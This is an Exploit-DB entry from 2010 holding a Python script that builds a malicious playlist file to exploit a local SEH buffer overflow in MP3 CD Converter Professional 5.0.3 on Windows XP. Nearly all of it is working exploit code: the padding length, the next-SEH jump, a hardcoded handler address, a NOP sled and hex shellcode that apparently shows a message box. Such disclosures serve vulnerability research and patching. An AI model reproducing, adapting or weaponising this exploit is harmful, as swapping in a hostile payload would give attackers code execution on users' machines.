MP3 CD Converter Professional - Local Buffer Overflow (SEH)

EDB-ID:

15785

CVE:





Platform:

Windows

Date:

2010-12-20


#!/usr/bin/python
#
#
#Python File Created BY C4SS!0 G0MES
#http://www.invasao.com.br
#Louredo_@hotmail.com
#
#
#[+]Exploit Titule: Exploit Buffer Overflow MP3 CD Converter Professional(SEH)
#[+]Date: 12/20/2010
#[+]Author: C4SS!0 G0M3S
#[+]Software Link: http://www.mp3-cd-converter.com/mp3cdconverter.exe
#[+]Version: 5.0.3
#[+]Tested On: WIN-XP SP3 Virtual Box
#[+]CVE: N/A
#
#
#


import os
import sys
import struct
import time

def usage():
    os.system("cls")
    os.system("color 4f")
    print("\n"
    "=====================================================================\n"
    "||                                                                 ||\n"
    "||      Exploit Buffer Overflow MP3 CD Converter Professional(SEH) ||\n"
    "||      Author C4SS!0 G0M3S                                        ||\n||"
    "                                                                 ||\n"
    "=====================================================================\n\n")

    print("[+]Exploit: Exploit Buffer Overflow MP3 CD Converter Professional(SEH)")
    print("[+]Date: 12/20/2010")
    print("[+]Author: C4SS!0 G0M3S")
    print("[+]E-mail: Louredo_@hotmail.com")
    print("[+]Home: http://www.invasao.com.br")
    print("[+]Impact: Hich")
    print("[+]Version: 5.0.3")
    print("[+]Country: Brazil\n")

if len(sys.argv) !=2:
    usage()
    print "[-]Usage: "+sys.argv[0]+" <File Name>"
    print "[-]Exemple: "+sys.argv[0]+" Exploit.pls"
    sys.exit(0)

buffer = "\x41" * 780
nseh = "\xeb\x0d\x90\x90"  #JMP SHORT 14
seh = struct.pack('<L',0x0077cebf)
nops = "\x90" * 10
usage()
print "[*]Identifying the length Shellcode"
time.sleep(1)
shellcode = ("\x33\xC0\x33\xC9\x33\xD2\x33\xDB\x50\x68\x6C\x6C\x20\x20\x68\x33\x32\x2E\x64\x68\x75\x73\x65\x72\x54\x58\xBB\x7B\x1D\x80\x7C\x50"
"\xFF\xD3\x90\x33\xD2\x52\xB9\x5E\x67\x30\xEF\x81\xC1\x11\x11\x11\x11\x51\x68\x61\x67\x65\x42\x68\x4D\x65\x73\x73\x54\x5A\x52\x50"
"\xB9\x30\xAE\x80\x7C\xFF\xD1\x33\xC9\x33\xD2\x33\xDB\x51\x68\x53\x20\x20\x20\x68\x47\x30\x4D\x33\x68\x53\x21\x30\x20\x68\x20\x43"
"\x34\x53\x68\x64\x20\x42\x79\x68\x6F\x69\x74\x65\x68\x45\x78\x70\x6C\x54\x59\x53\x68\x21\x30\x20\x20\x68\x43\x34\x53\x53\x54\x5B"
"\x6A\x40\x53\x51\x52\xFF\xD0\x33\xC0\x50\xBE\xFA\xCA\x81\x7C\xFF\xD6")

print "[*]The length is Shellcode:"+str(len(shellcode))
time.sleep(1)



payload = str(buffer+nseh+seh+nops+shellcode)

print "[*]Creating the Archive "+sys.argv[1]
time.sleep(1)
file = sys.argv[1]
try:
    f=open(file,"w")
    f.write(payload)
    f.close()
    print "[*]The Archive was created "+str(file)+" Success"
    time.sleep(1)
except:
    print "[-]Error Creating File "+file